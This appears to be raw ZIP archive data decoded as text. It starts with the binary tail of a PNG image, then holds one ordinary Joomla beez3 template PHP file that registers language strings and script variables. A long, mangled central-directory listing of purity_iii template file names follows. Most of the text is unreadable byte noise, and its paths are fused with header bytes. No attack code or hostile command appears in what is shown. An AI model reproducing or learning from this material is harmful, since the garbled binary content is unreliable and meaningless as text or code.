݂݀�<H8��RZ�Z�h3f�^f�`y}��l��qS�U�mW��|6��cw�f)�"	�Z*۱,C�v����i59ֺ�f����B� �!B����V����ܖ�w�2mm��:|ku6hy7��]I����_��c���ԅ�;」1?�������1���V[cGn�֬�}�x��TX��8|K���ʹ��~�G���嘩�5���r���?�R
��s�������4�N�t��y�g�z$�=���ʧ�o�d������ǻL��0�8�L�M���[伡���*<���R��\��P:�o4���%_Ö�Gm*:\��$h�íP�Tl��"I�V���1��e����
X��5��2ٗہn,_Z]�tef�I���٧�,��C��������
��[�_�_�_�Q�ݵ���\*��g����R���W��J�L�86:��ϮZ���$-��$��s���_�V#O�N�b��U#YmurI�e;�^39�Q�|׹/|���(mT'�
����=�Q��`A30`�LH�*��l'o���a`�w�p	�4����1P ���'��b/�B(��z��ty��e�S�Y�00����f�#0T�
]]ߊ�M4�F��{��啪36�S۴�T|ymchx�'m0�_ϸ�_�S��~1�!�;�$���_Z�V7ߗ�o9��v3�(]���:I���6�b����SS5�NG��J�.���v�]gb�G1E�"�`E��.��(�H� �Τ^n����~���0~�T�ݏEH��:b�a���`A�dYC
!|=U�#p]ʹ�p���`�3A@ ��l�#!0B>�B���@�����&��"�@��c�d���s��!�D��V9�D^�<PF�q�w��W�7z�1��@���+�e����+��ҕ�S�����B���N�:���O'|�ݰ�L!'�F��[*֗/��~ibT����l��:�f��$�X��L��C]S&,�8��T"�ŅRi،)�jU%��I�ݶ\n&��aV[e��M[.M%c�Յz'�G<t|
 L'c��W�x"���(
�@D��T)��bB�N���j�V�M$⒪�]7@ $X���8�j����ٵ�����ͥK�+G�;���v+�M���v�K�1�cu��)2�=w&��(�Wʞj�͍�<nQ~�I���Q{�B%4Am�Ң��HR꬞����;>��tm��}�?�7��s��>|�wt�����2���O�o�}GƝ�S�}w|�+�t]p:M;g�O��up���ϷC��߲���|�l��L�Ž�uU6�7�_k��_8{�r�O��ߧ����_�7BZku����n*��k>I��[�ɜ�?����;g6�w�[��G�����m�����%�b�	���z��9�������{�~��_TI��+�䷿{������7����7������w�?��{�6�&����{?�AUl=��������+fo
���!��jWw�i{(b��F�-K�ˊ�irĪu�g��u�V�cd��FS�ɤB={��%����"R�'V��b�.�p��|Z���vC�
�v�1���h���kN(��`l`x$d�����R_L#�D$NCňu��<�M�񙄘�j,�/^Z����B��ԈǓ	sk}�LLy�?�;���Z����mW���4�$-Q��^�x1�U�)���Z��|ڰ����&�nEJ����
	5�
�!��CGF[�m�	{���=��H\N�F�cO5QY��R�4T��h�AWV�!4C��g�O���X-��N)�Z���0�\�a��E�Ȳ��ו圿h㟭��G��&�Ml�/-n��r����G'eE=x���G~s�-�c����(95=�����z߾}��u�*+`�7�j�����p7���+N[�M����T1Y�X�5�V2��\$3iXM;������B!�K��	J&R�ی��^��=�T�cO��oOpm�=~ETBx���/�߁��*I��W$��/�(�!��z�M�^w�=�T�Sm's*��c���q!�$��WT)�
�cJ�1�vi�⵸;���s_�=����<���~���}�	��0a�<��'
�a]&����
�k9�	J�1�$E�r��!Bȵ��(����6�(�^��;�k�F�%��>��
���<��F/�9�͡�B��o|�[L��=�g /\Z���{�)��>��°�tX�s:��>xp:bL���Z��Ӈ�K)�˥q]�6�N�#&I��E"BP���_ox�=G�����i����C�ڛ�/R*�]�V�e���L���"��c?|�|����C~�f%����왧n�����FC!^}վ���~���c7�۞b�qį��bL9��:0�%��M�n��R�x��V>�~��Q�s�Z��R�?�K��/�o�m�t'�J��0|x8�?^88�I˨���M��w�4���b�\�K�x�
���mD�$��_����6�d)�Xi�z,NX��)��k�cbf�\�x(��T��u<��7�j� �
!x���⩘�...ē٘��n�x,����ⵘ@?����M�����3M���o���˕���^�ў�O�G���;�!��.}��9
�r���\��w�I�b}=�]�\r�u�xj��+����}Wlrq�|�J��d��S�O|{��?xs/x�4�������2���ϖ�.��`�'�/�|��
�J=דu��
�?p[��]}�Tyl(}ǰ��s&66���������v��U۝C!�
�ˏ
��Z!v�J��]^k�\���4:�����<��y����p:����]��UT�I�
~��ƍ�}ݦ~../W�Y���Y��s�3�z��S��V����KM��y2a�g�3�˙|z��9F��-v���}v��v*��w��/Us�D��ňX����V��C)�c?�В����.m
���x-�v̭Ԡ�M���P�J��Rm�'�P0�]Ϟj����}�uIPug��x��ޝ�BM�w�NUU��>��S!��z-�����`Ǟj�er_��׾�s�ڰ[s��7�j�W�w�`��N5 �%��s�y�V�_�e�ί�j�(t�={^@yljRF��]M�;<�,a!����¬�SS�V��`&P���6����2�k:>E��TQ��ᑷ�����XG2:9^oV}/�H��ު�x�+�\8s�46Y�J^� �o|����C�v�eB�i�7��*!
B{����,\]Lz����k�H���!2c����4d0��CF7�ʊ��7���U^[����z����	�k���T&-	�^����V���۱V֪�\�@*k�tRo7�!�|���7�jj�~�׾0si���O��9������{?��O
QJ_Վ�xTו�6��n���ӫ�CE�g>������=���:Wfx|�;�v�����ڗ��=]�C�_��T�Ҝ��F
��Nf������o���
~��������O��y�J&g˹���>y�[v�Rg�w��l��o_��?��}�K~�?��+s�FZ��Tߩ�gb����8߸������O.��m���4�s��ן�X=x�XX^Z����q�^<>����ܟ��K-19`~�k���`��?4������s�{q�y���8�&��XPo�����Z*�םjo,U���d�|�Q�Ulg��*V��D�p����vwI�ۨ[}]��@���v�z
W�kDVE��b�z�a��0���6d;�j�����#xm��Ѱ�����&�Дy�@:Sh��
U�0̘ߩ5�A*�c�Q����io��S���9���&̭J*����FK7��T�U��rU1� b�f<%�rck�����vy뉤N*�m$)�t�mY��B���")�M5[��H&�M���O?}��Z�]��ጆ�S%�ע�ov��ӧ'''�Z�����@9����]�^��O�q�fs��43���,ܭ���f7�M
Q�T[-OV���Z6�SU�n���}���w=����}�^��:=��d*%a^���Ͷ�gME6̈��r5$Z\��
zݡ1����d��nd���g�zZK�g)��L:^�X
@LVH]ǣD�w�D���\��WVh@s�.(��jZ-+W�(r�@$�}/��;�a�Q�¾;si����5ɴ��h�I�k�{~@���EJ���A�F��wᑢЖ�IEND�B`�PK՜�\~�ƃ��beez3/jsstrings.phpnu�[���<?php
/**
 * @package     Joomla.Site
 * @subpackage  Templates.beez3
 *
 * @copyright   (C) 2012 Open Source Matters, Inc. <https://www.joomla.org>
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

// No direct access.
defined('_JEXEC') or die;

JText::script('TPL_BEEZ3_ALTOPEN');
JText::script('TPL_BEEZ3_ALTCLOSE');
JText::script('TPL_BEEZ3_TEXTRIGHTOPEN');
JText::script('TPL_BEEZ3_TEXTRIGHTCLOSE');
JText::script('TPL_BEEZ3_FONTSIZE');
JText::script('TPL_BEEZ3_BIGGER');
JText::script('TPL_BEEZ3_RESET');
JText::script('TPL_BEEZ3_SMALLER');
JText::script('TPL_BEEZ3_INCREASE_SIZE');
JText::script('TPL_BEEZ3_REVERT_STYLES_TO_DEFAULT');
JText::script('TPL_BEEZ3_DECREASE_SIZE');
JText::script('TPL_BEEZ3_OPENMENU');
JText::script('TPL_BEEZ3_CLOSEMENU');

$this->addScriptDeclaration("
	var big        = '" . (int) $this->params->get('wrapperLarge') . "%';
	var small      = '" . (int) $this->params->get('wrapperSmall') . "%';
	var bildauf    = '" . $this->baseurl . '/templates/' . $this->template . "/images/plus.png';
	var bildzu     = '" . $this->baseurl . '/templates/' . $this->template . "/images/minus.png';
	var rightopen  = '" . JText::_('TPL_BEEZ3_TEXTRIGHTOPEN', true) . "';
	var rightclose = '" . JText::_('TPL_BEEZ3_TEXTRIGHTCLOSE', true) . "';
	var altopen    = '" . JText::_('TPL_BEEZ3_ALTOPEN', true) . "';
	var altclose   = '" . JText::_('TPL_BEEZ3_ALTCLOSE', true) . "';
");
PKӜ�\��w��purity_iii/css/offline.cssnu&1i�PKӜ�\��swHwH 	purity_iii/css/frontend-edit.cssnu&1i�PKӜ�\+e���-�Qpurity_iii/css/rtl/extras/com_joomprofile.cssnu&1i�PKӜ�\�?���-�Rpurity_iii/css/rtl/extras/com_easydiscuss.cssnu&1i�PKӜ�\�l�d��*�Spurity_iii/css/rtl/extras/com_easyblog.cssnu&1i�PKӜ�\��QQ*�Wpurity_iii/css/rtl/extras/com_mijoshop.cssnu&1i�PKӜ�\�S�??+�lpurity_iii/css/rtl/extras/com_community.cssnu&1i�PKӜ�\k�O���,$~purity_iii/css/rtl/extras/com_easysocial.cssnu&1i�PKӜ�\���J�o�o(3�purity_iii/css/rtl/extras/com_kunena.cssnu&1i�PKӜ�\_SNlrr-��purity_iii/css/rtl/extras/layout_glossary.cssnu&1i�PKӜ�\*�T���#R�purity_iii/css/rtl/layouts/docs.cssnu&1i�PKӜ�\�6�
��'{�purity_iii/css/rtl/layouts/magazine.cssnu&1i�PKӜ�\-[
purity_iii/css/rtl/layouts/features-intro.cssnu&1i�PKӜ�\��ﱛ�#�
purity_iii/css/rtl/layouts/blog.cssnu&1i�PKӜ�\�ر6'�purity_iii/css/rtl/layouts/porfolio.cssnu&1i�PKӜ�\�.��(purity_iii/css/rtl/layouts/corporate.cssnu&1i�PKӜ�\1�o�ll_purity_iii/css/rtl/windows.cssnu&1i�PKӜ�\��C[[purity_iii/css/rtl/red/home.cssnu&1i�PKӜ�\���.�H�H(�#purity_iii/css/rtl/red/frontend-edit.cssnu&1i�PKӜ�\���VV,�lpurity_iii/css/rtl/red/legacy-navigation.cssnu&1i�PKӜ�\1�o�ll"Zopurity_iii/css/rtl/red/windows.cssnu&1i�PKӜ�\t�(!��+ppurity_iii/css/rtl/red/layouts/magazine.cssnu&1i�PKӜ�\�.��,�~purity_iii/css/rtl/red/layouts/corporate.cssnu&1i�PKӜ�\'�pd��'H�purity_iii/css/rtl/red/layouts/blog.cssnu&1i�PKӜ�\1:�purity_iii/css/rtl/red/layouts/features-intro.cssnu&1i�PKӜ�\LMN��'��purity_iii/css/rtl/red/layouts/docs.cssnu&1i�PKӜ�\Ў+Ȍpurity_iii/css/rtl/red/layouts/porfolio.cssnu&1i�PKӜ�\�('�

&@�purity_iii/css/rtl/red/legacy-grid.cssnu&1i�PKӜ�\�S�??/��purity_iii/css/rtl/red/extras/com_community.cssnu&1i�PKӜ�\+e���1@�purity_iii/css/rtl/red/extras/com_joomprofile.cssnu&1i�PKӜ�\�?���1a�purity_iii/css/rtl/red/extras/com_easydiscuss.cssnu&1i�PKӜ�\�� �QQ.g�purity_iii/css/rtl/red/extras/com_mijoshop.cssnu&1i�PKӜ�\k�O���0�purity_iii/css/rtl/red/extras/com_easysocial.cssnu&1i�PKӜ�\�l�d��.)�purity_iii/css/rtl/red/extras/com_easyblog.cssnu&1i�PKӜ�\�%J�o�o,�purity_iii/css/rtl/red/extras/com_kunena.cssnu&1i�PKӜ�\��&�rr1r>purity_iii/css/rtl/red/extras/layout_glossary.cssnu&1i�PKӜ�\	Sl�Q�Q%EEpurity_iii/css/rtl/red/off-canvas.cssnu&1i�PKӜ�\R&���=�=#B�purity_iii/css/rtl/red/megamenu.cssnu&1i�PKӜ�\���H�l�l$f�purity_iii/css/rtl/red/bootstrap.cssnu&1i�PKӜ�\�EG� Z Z#ZBpurity_iii/css/rtl/red/template.cssnu&1i�PKӜ�\mAa`[[͜purity_iii/css/rtl/home.cssnu&1i�PKӜ�\�0�F[[ s�purity_iii/css/rtl/dark/home.cssnu&1i�PKӜ�\��]3]N]N&�purity_iii/css/rtl/dark/off-canvas.cssnu&1i�PKӜ�\1�o�ll#�purity_iii/css/rtl/dark/windows.cssnu&1i�PKӜ�\m��I�
�
'��purity_iii/css/rtl/dark/legacy-grid.cssnu&1i�PKӜ�\,�S��%}purity_iii/css/rtl/dark/bootstrap.cssnu&1i�PKӜ�\5�K]]-�	purity_iii/css/rtl/dark/legacy-navigation.cssnu&1i�PKӜ�\�h4�**)w	purity_iii/css/rtl/dark/frontend-edit.cssnu&1i�PKӜ�\Q4�5�5$�3	purity_iii/css/rtl/dark/megamenu.cssnu&1i�PKӜ�\O��o�o�$�i	purity_iii/css/rtl/dark/template.cssnu&1i�PKӜ�\��i�l�l �
purity_iii/css/rtl/bootstrap.cssnu&1i�PKӜ�\���VV(�tpurity_iii/css/rtl/legacy-navigation.cssnu&1i�PKӜ�\)^�ZZ=wpurity_iii/css/rtl/template.cssnu&1i�PKӜ�\�('�

"��
purity_iii/css/rtl/legacy-grid.cssnu&1i�PKӜ�\T$���=�=�
purity_iii/css/rtl/megamenu.cssnu&1i�PKӜ�\�����Q�Q!#purity_iii/css/rtl/off-canvas.cssnu&1i�PKӜ�\���.�H�H+lpurity_iii/css/rtl/orange/frontend-edit.cssnu&1i�PKӜ�\��Ơl�l'�purity_iii/css/rtl/orange/bootstrap.cssnu&1i�PKӜ�\��/rr4�!purity_iii/css/rtl/orange/extras/layout_glossary.cssnu&1i�PKӜ�\�S�??2�(purity_iii/css/rtl/orange/extras/com_community.cssnu&1i�PKӜ�\k�O���3r:purity_iii/css/rtl/orange/extras/com_easysocial.cssnu&1i�PKӜ�\�?���4�=purity_iii/css/rtl/orange/extras/com_easydiscuss.cssnu&1i�PKӜ�\tJ%��o�o/�>purity_iii/css/rtl/orange/extras/com_kunena.cssnu&1i�PKӜ�\+e���4�purity_iii/css/rtl/orange/extras/com_joomprofile.cssnu&1i�PKӜ�\h�E�QQ1�purity_iii/css/rtl/orange/extras/com_mijoshop.cssnu&1i�PKӜ�\�l�d��1��purity_iii/css/rtl/orange/extras/com_easyblog.cssnu&1i�PKӜ�\���VV/��purity_iii/css/rtl/orange/legacy-navigation.cssnu&1i�PKӜ�\�#���Q�Q(k�purity_iii/css/rtl/orange/off-canvas.cssnu&1i�PKӜ�\�('�

)kpurity_iii/css/rtl/orange/legacy-grid.cssnu&1i�PKӜ�\1�o�ll%�'purity_iii/css/rtl/orange/windows.cssnu&1i�PKӜ�\;�K��*�(purity_iii/css/rtl/orange/layouts/blog.cssnu&1i�PKӜ�\��T��*�,purity_iii/css/rtl/orange/layouts/docs.cssnu&1i�PKӜ�\4�2purity_iii/css/rtl/orange/layouts/features-intro.cssnu&1i�PKӜ�\��k.3purity_iii/css/rtl/orange/layouts/porfolio.cssnu&1i�PKӜ�\�.��/�:purity_iii/css/rtl/orange/layouts/corporate.cssnu&1i�PKӜ�\�,��.�=purity_iii/css/rtl/orange/layouts/magazine.cssnu&1i�PKӜ�\�d���=�=&�Lpurity_iii/css/rtl/orange/megamenu.cssnu&1i�PKӜ�\]w�q Z Z&�purity_iii/css/rtl/orange/template.cssnu&1i�PKӜ�\�1�8�H�H$h�purity_iii/css/rtl/frontend-edit.cssnu&1i�PKӜ�\�	�	F.purity_iii/css/legacy-grid.cssnu&1i�PKӜ�\��HH�8purity_iii/css/custom.cssnu�[���PKӜ�\7�k�k�k#=purity_iii/css/bootstrap.cssnu&1i�PKӜ�\���#e�purity_iii/css/layouts/porfolio.cssnu&1i�PKӜ�\'R�Ĝ�аpurity_iii/css/layouts/blog.cssnu&1i�PKӜ�\*�T�����purity_iii/css/layouts/docs.cssnu&1i�PKӜ�\�.��$�purity_iii/css/layouts/corporate.cssnu&1i�PKӜ�\)$�purity_iii/css/layouts/features-intro.cssnu&1i�PKӜ�\L�A���#}�purity_iii/css/layouts/magazine.cssnu&1i�PKӜ�\T9�PPY�purity_iii/css/ie8.cssnu&1i�PKӜ�\1�o�ll��purity_iii/css/windows.cssnu&1i�PKӜ�\]��p��purity_iii/css/error.cssnu&1i�PKӜ�\mAa`[[�purity_iii/css/home.cssnu&1i�PKӜ�\��q�3O3O��purity_iii/css/off-canvas.cssnu&1i�PKӜ�\��VpTT$*+purity_iii/css/legacy-navigation.cssnu&1i�PKӜ�\�#o,,�-purity_iii/css/index.htmlnu&1i�PKӜ�\Ic�p7p7G.purity_iii/css/megamenu.cssnu&1i�PKӜ�\�����X�Xfpurity_iii/css/template.cssnu&1i�PKӜ�\�p������purity_iii/css/themes/index.phpnu�[���PKӜ�\
�Q�ll'KDpurity_iii/css/themes/red/bootstrap.cssnu&1i�PKӜ�\���g3O3O(�� purity_iii/css/themes/red/off-canvas.cssnu&1i�PKӜ�\�Xl�}H}H+G!purity_iii/css/themes/red/frontend-edit.cssnu&1i�PKӜ�\��VpTT/I!purity_iii/css/themes/red/legacy-navigation.cssnu&1i�PKӜ�\h��p7p7&�K!purity_iii/css/themes/red/megamenu.cssnu&1i�PKӜ�\���0�X�X&��!purity_iii/css/themes/red/template.cssnu&1i�PKӜ�\LMN��*��"purity_iii/css/themes/red/layouts/docs.cssnu&1i�PKӜ�\�.��/��"purity_iii/css/themes/red/layouts/corporate.cssnu&1i�PKӜ�\����.&�"purity_iii/css/themes/red/layouts/magazine.cssnu&1i�PKӜ�\4
�"purity_iii/css/themes/red/layouts/features-intro.cssnu&1i�PKӜ�\�!<��*q�"purity_iii/css/themes/red/layouts/blog.cssnu&1i�PKӜ�\��M�.g�"purity_iii/css/themes/red/layouts/porfolio.cssnu&1i�PKӜ�\�	�	)�#purity_iii/css/themes/red/legacy-grid.cssnu&1i�PKӜ�\��P=OO1:#purity_iii/css/themes/red/extras/com_mijoshop.cssnu&1i�PKӜ�\=[����3�#purity_iii/css/themes/red/extras/com_easysocial.cssnu&1i�PKӜ�\���|qq4�"#purity_iii/css/themes/red/extras/layout_glossary.cssnu&1i�PKӜ�\�y���1�)#purity_iii/css/themes/red/extras/com_easyblog.cssnu&1i�PKӜ�\*�ن>>2�-#purity_iii/css/themes/red/extras/com_community.cssnu&1i�PKӜ�\BL���4l?#purity_iii/css/themes/red/extras/com_easydiscuss.cssnu&1i�PKӜ�\+e���4u@#purity_iii/css/themes/red/extras/com_joomprofile.cssnu&1i�PKӜ�\�	�o�o/�A#purity_iii/css/themes/red/extras/com_kunena.cssnu&1i�PKӜ�\�dBt3O3O+�#purity_iii/css/themes/orange/off-canvas.cssnu&1i�PKӜ�\�Xl�}H}H.z$purity_iii/css/themes/orange/frontend-edit.cssnu&1i�PKӜ�\���ll*UJ$purity_iii/css/themes/orange/bootstrap.cssnu&1i�PKӜ�\��VpTT2ɶ&purity_iii/css/themes/orange/legacy-navigation.cssnu&1i�PKӜ�\�y���4�&purity_iii/css/themes/orange/extras/com_easyblog.cssnu&1i�PKӜ�\���qq7z�&purity_iii/css/themes/orange/extras/layout_glossary.cssnu&1i�PKӜ�\=[����6R�&purity_iii/css/themes/orange/extras/com_easysocial.cssnu&1i�PKӜ�\w� �OO4j�&purity_iii/css/themes/orange/extras/com_mijoshop.cssnu&1i�PKӜ�\BL���7�&purity_iii/css/themes/orange/extras/com_easydiscuss.cssnu&1i�PKӜ�\���I�o�o2)�&purity_iii/css/themes/orange/extras/com_kunena.cssnu&1i�PKӜ�\+e���7M'purity_iii/css/themes/orange/extras/com_joomprofile.cssnu&1i�PKӜ�\*�ن>>5�N'purity_iii/css/themes/orange/extras/com_community.cssnu&1i�PKӜ�\7I`'purity_iii/css/themes/orange/layouts/features-intro.cssnu&1i�PKӜ�\�yq�1�`'purity_iii/css/themes/orange/layouts/porfolio.cssnu&1i�PKӜ�\M�J��1/h'purity_iii/css/themes/orange/layouts/magazine.cssnu&1i�PKӜ�\�.��2w'purity_iii/css/themes/orange/layouts/corporate.cssnu&1i�PKӜ�\��T��-kz'purity_iii/css/themes/orange/layouts/docs.cssnu&1i�PKӜ�\�u��-��'purity_iii/css/themes/orange/layouts/blog.cssnu&1i�PKӜ�\Z���X�X)��'purity_iii/css/themes/orange/template.cssnu&1i�PKӜ�\�/p7p7)��(purity_iii/css/themes/orange/megamenu.cssnu&1i�PKӜ�\�	�	,r)purity_iii/css/themes/orange/legacy-grid.cssnu&1i�PKӜ�\=[����(�)purity_iii/css/extras/com_easysocial.cssnu&1i�PKӜ�\+e���)�")purity_iii/css/extras/com_joomprofile.cssnu&1i�PKӜ�\�/OO&�#)purity_iii/css/extras/com_mijoshop.cssnu&1i�PKӜ�\BL���)�8)purity_iii/css/extras/com_easydiscuss.cssnu&1i�PKӜ�\*�ن>>'�9)purity_iii/css/extras/com_community.cssnu&1i�PKӜ�\�y���&'K)purity_iii/css/extras/com_easyblog.cssnu&1i�PKӜ�\us"8�o�o$O)purity_iii/css/extras/com_kunena.cssnu&1i�PKӜ�\e^��qq)\�)purity_iii/css/extras/layout_glossary.cssnu&1i�PKӜ�\�V�2&�)purity_iii/html/mod_tags_popular/helper/index.htmlnu&1i�PKӜ�\�#e�TT1��)purity_iii/html/mod_tags_popular/helper/route.phpnu&1i�PKӜ�\����22,\�)purity_iii/html/mod_tags_popular/default.phpnu&1i�PKӜ�\"��||*��)purity_iii/html/mod_tags_popular/cloud.phpnu&1i�PKӜ�\�V�+��)purity_iii/html/mod_tags_popular/index.htmlnu&1i�PKӜ�\�F�[[9:�)purity_iii/html/com_weblinks/categories/default_items.phpnu&1i�PKӜ�\�V�2��)purity_iii/html/com_weblinks/categories/index.htmlnu&1i�PKӜ�\�V�'�)purity_iii/html/com_weblinks/index.htmlnu&1i�PKӜ�\���221��)purity_iii/html/mod_articles_category/default.phpnu&1i�PKӜ�\�V�0��)purity_iii/html/mod_articles_category/index.htmlnu&1i�PKӜ�\�V�"�)purity_iii/html/layouts/index.htmlnu&1i�PKӜ�\�v],,-x�)purity_iii/html/layouts/joomla/modal/main.phpnu&1i�PKӜ�\��;f77H*purity_iii/html/layouts/joomla/content/blog_style_default_item_title.phpnu&1i�PKӜ�\E�c	c	;�%*purity_iii/html/layouts/joomla/content/info_block/block.phpnu&1i�PKӜ�\a4l=��>~/*purity_iii/html/layouts/joomla/content/info_block/category.phpnu&1i�PKӜ�\ohE���B�3*purity_iii/html/layouts/joomla/content/info_block/publish_date.phpnu&1i�PKӜ�\H1IbbE�6*purity_iii/html/layouts/joomla/content/info_block/parent_category.phpnu&1i�PKӜ�\˃�)::*purity_iii/html/layouts/joomla/content/info_block/hits.phpnu&1i�PKӜ�\�V�<�<*purity_iii/html/layouts/joomla/content/info_block/index.htmlnu&1i�PKӜ�\_pz__A�=*purity_iii/html/layouts/joomla/content/info_block/modify_date.phpnu&1i�PKӜ�\Sa%�bbAW@*purity_iii/html/layouts/joomla/content/info_block/create_date.phpnu&1i�PKӜ�\ݪ.��<*C*purity_iii/html/layouts/joomla/content/info_block/author.phpnu&1i�PKӜ�\$�L�
�
3,G*purity_iii/html/layouts/joomla/content/readmore.phpnu&1i�PKӜ�\�V�1-R*purity_iii/html/layouts/joomla/content/index.htmlnu&1i�PKӜ�\T3�ww5�R*purity_iii/html/layouts/joomla/content/item_aside.phpnu&1i�PKӜ�\�V�)�Z*purity_iii/html/layouts/joomla/index.htmlnu&1i�PKӜ�\�QO��[*purity_iii/html/modules.phpnu&1i�PKӜ�\��TT&�y*purity_iii/html/mod_footer/default.phpnu&1i�PKӜ�\�V�%�|*purity_iii/html/mod_footer/index.htmlnu&1i�PKӜ�\�V�&}*purity_iii/html/com_contact/index.htmlnu&1i�PKӜ�\Z�""6y}*purity_iii/html/com_contact/category/default_items.phpnu&1i�PKӜ�\�6�/�*purity_iii/html/com_contact/category/index.htmlnu&1i�PKӜ�\߄�B  ~�*purity_iii/html/index.htmlnu&1i�PKӜ�\~r|���&�*purity_iii/html/mod_search/default.phpnu&1i�PKӜ�\�V�%�*purity_iii/html/mod_search/index.htmlnu&1i�PKӜ�\��T??0|�*purity_iii/html/mod_articles_archive/default.phpnu&1i�PKӜ�\�V�/�*purity_iii/html/mod_articles_archive/index.htmlnu&1i�PKӜ�\߄�B  ,��*purity_iii/html/com_finder/search/index.htmlnu&1i�PKӜ�\�K�77-�*purity_iii/html/com_finder/search/default.phpnu&1i�PKԜ�\߄�B  %��*purity_iii/html/com_finder/index.htmlnu&1i�PKԜ�\���~6�*purity_iii/html/com_content/featured/default_links.phpnu&1i�PKԜ�\/�z�v
v
0��*purity_iii/html/com_content/featured/default.phpnu&1i�PKԜ�\�Yqq5^�*purity_iii/html/com_content/featured/default_item.phpnu&1i�PKԜ�\wtW�/4�*purity_iii/html/com_content/featured/index.htmlnu&1i�PKԜ�\�V�&��*purity_iii/html/com_content/index.htmlnu&1i�PKԜ�\l�<gg<"�*purity_iii/html/com_content/category/features-intro_item.phpnu&1i�PKԜ�\:�`446��*purity_iii/html/com_content/category/magazine_list.phpnu&1i�PKԜ�\R��1��*purity_iii/html/com_content/category/magazine.phpnu&1i�PKԜ�\�(H�.F.F1�*purity_iii/html/com_content/category/magazine.xmlnu&1i�PKԜ�\��G99.�7+purity_iii/html/com_content/category/xblog.phpnu&1i�PKԜ�\߱�33.1C+purity_iii/html/com_content/category/xblog.xmlnu&1i�PKԜ�\�s;FF2�v+purity_iii/html/com_content/category/portfolio.phpnu&1i�PKԜ�\�Hhb}1}12G~+purity_iii/html/com_content/category/portfolio.xmlnu&1i�PKԜ�\g�[+�	�	7&�+purity_iii/html/com_content/category/portfolio_item.phpnu&1i�PKԜ�\�V�/A�+purity_iii/html/com_content/category/index.htmlnu&1i�PKԜ�\�S��335��+purity_iii/html/com_content/category/magazine-sub.phpnu&1i�PKԜ�\��X		:W�+purity_iii/html/com_content/category/magazine_featured.phpnu&1i�PKԜ�\WH�PP3��+purity_iii/html/com_content/category/xblog_item.phpnu&1i�PKԜ�\b1�V��7},purity_iii/html/com_content/category/glossary_group.phpnu&1i�PKԜ�\=h���
�
1�	,purity_iii/html/com_content/category/glossary.xmlnu&1i�PKԜ�\�%K''7�,purity_iii/html/com_content/category/features-intro.phpnu&1i�PKԜ�\���#1#17T,purity_iii/html/com_content/category/features-intro.xmlnu&1i�PKԜ�\��-ɲ�1�L,purity_iii/html/com_content/category/glossary.phpnu&1i�PKԜ�\�����/�a,purity_iii/html/com_content/article/default.phpnu&1i�PKԜ�\�V�.M|,purity_iii/html/com_content/article/index.htmlnu&1i�PKԜ�\�#o,,,�|,purity_iii/fonts/font-awesome/css/index.htmlnu&1i�PKԜ�\�ʼ&�&�2R},purity_iii/fonts/font-awesome/css/font-awesome.cssnu&1i�PKԜ�\�8�yy6�-purity_iii/fonts/font-awesome/css/font-awesome.min.cssnu&1i�PKԜ�\\�DŬ���;X�-purity_iii/fonts/font-awesome/fonts/fontawesome-webfont.ttfnu&1i�PKԜ�\3{��~�~<o0purity_iii/fonts/font-awesome/fonts/fontawesome-webfont.woffnu&1i�PKԜ�\�#o,,.Ï1purity_iii/fonts/font-awesome/fonts/index.htmlnu&1i�PKԜ�\��;_����;M�1purity_iii/fonts/font-awesome/fonts/fontawesome-webfont.svgnu&1i�PKԜ�\Op�n�n�;�X8purity_iii/fonts/font-awesome/fonts/fontawesome-webfont.eotnu&1i�PKԜ�\��Uh-h-=l�:purity_iii/fonts/font-awesome/fonts/fontawesome-webfont.woff2nu&1i�PKԜ�\1��˜�3A<purity_iii/fonts/font-awesome/fonts/FontAwesome.otfnu&1i�PKԜ�\�#o,,(<>purity_iii/fonts/font-awesome/index.htmlnu&1i�PKԜ�\Ir�+�>purity_iii/templateDetails.xmlnu&1i�PKԜ�\��64>purity_iii/language/en-GB/en-GB.tpl_purity_iii.sys.ininu&1i�PKԜ�\���+�+2�F>purity_iii/language/en-GB/en-GB.tpl_purity_iii.ininu&1i�PKԜ�\�굣�r>purity_iii/templateInfo.phpnu&1i�PKԜ�\2�X�
�
6y>purity_iii/offline.phpnu&1i�PKԜ�\v� ��'�>purity_iii/images/emoticons.pngnu&1i�PKԜ�\�Lα��?�>purity_iii/images/arrow.pngnu&1i�PKԜ�\��8�����+T�>purity_iii/images/Background_megadanse2.pngnu&1i�PKԜ�\/�
1GG �Bpurity_iii/images/nav-active.gifnu&1i�PKԜ�\�Q0s*�Bpurity_iii/images/porfolio-item-states.pngnu&1i�PKԜ�\Y�Q�&�&�u�Bpurity_iii/images/faces.pngnu&1i�PKԜ�\��W��*�@Cpurity_iii/images/Background_megadanse.pngnu&1i�PKԜ�\INz��� �[Dpurity_iii/images/ico/search.pngnu&1i�PKԜ�\�Xޏ��'�aDpurity_iii/images/ico/search-invert.pngnu&1i�PKԜ�\i�Dll�gDpurity_iii/images/demo/logo.pngnu&1i�PKԜ�\������}Dpurity_iii/images/index.phpnu�[���PKԜ�\]���		��Dpurity_iii/images/logo.pngnu&1i�PKԜ�\s��&ߚDpurity_iii/images/system/arrow_rtl.pngnu&1i�PKԜ�\�Lα��"I�Dpurity_iii/images/system/arrow.pngnu&1i�PKԜ�\8�*2w1w1!e�Dpurity_iii/template_thumbnail.pngnu&1i�PKԜ�\/}f
��-�Dpurity_iii/index.phpnu&1i�PKԜ�\	C�=88;��Dpurity_iii/local/html/com_content/featured/default_item.phpnu&1i�PKԜ�\�Tvv)��Dpurity_iii/local/etc/layout/corporate.ininu&1i�PKԜ�\�.��6m�Dpurity_iii/local/less/themes/red/variables-custom.lessnu&1i�PKԜ�\��-��7m�Dpurity_iii/local/less/themes/gris/variables-custom.lessnu&1i�PKԜ�\�vSA��/qEpurity_iii/local/less/themes/rose/template.lessnu&1i�PKԜ�\��d���0�Epurity_iii/local/less/themes/rose/variables.lessnu&1i�PKԜ�\ӋhH��7�Epurity_iii/local/less/themes/rose/variables-custom.lessnu&1i�PKԜ�\MP,��7�
Epurity_iii/local/less/themes/vert/variables-custom.lessnu&1i�PKԜ�\���1�
